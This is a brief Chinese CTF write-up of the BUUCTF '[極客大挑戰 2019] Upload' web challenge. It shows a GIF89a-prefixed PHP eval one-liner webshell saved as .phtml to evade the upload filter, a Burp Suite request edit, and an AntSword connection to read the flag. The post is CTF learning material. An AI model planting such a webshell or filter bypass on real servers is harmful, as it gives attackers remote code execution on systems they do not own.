CTF-Web-[極客大挑戰(zhàn) 2019]Upload

CTF-Web-[極客大挑戰(zhàn) 2019]Upload

博客說(shuō)明

文章所涉及的資料來(lái)自互聯(lián)網(wǎng)整理和個(gè)人總結(jié),意在于個(gè)人學(xué)習(xí)和經(jīng)驗(yàn)匯總,如有什么地方侵權(quán),請(qǐng)聯(lián)系本人刪除,謝謝!本文僅用于學(xué)習(xí)與交流,不得用于非法用途!

CTP平臺(tái)

網(wǎng)址

https://buuoj.cn/challenges

題目

Web類(lèi),[極客大挑戰(zhàn) 2019]Upload

image-20200503185408158

打開(kāi)題目的實(shí)例

image-20200503185541064

思路

做一個(gè)phtml的文件

image-20200503191203100

將里面的內(nèi)容改為一句話(huà)木馬,為我們后面的蟻劍連接做準(zhǔn)備

GIF89a
<script language="php">eval($_POST['shell']);</script> 

我們將它上傳,使用bp截取,修改一下格式,再放行

image-20200503192426171
image-20200503192443531

蟻劍連接

我們使用蟻劍連接,猜測(cè)路徑為upload

/upload/test.phtml

完整路徑

http://3cc0c310-5536-49f0-8e10-1aca744981b8.node3.buuoj.cn/upload/test.phtml

密碼就是我們?cè)谝痪湓?huà)密碼里面寫(xiě)的

shell
image-20200503192737386

然后我們就進(jìn)來(lái)了

image-20200503192931850

像這樣的話(huà)直接找根目錄,發(fā)現(xiàn)flag

image-20200503193109111

感謝

BUUCTF

以及勤勞的自己

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀(guān)點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容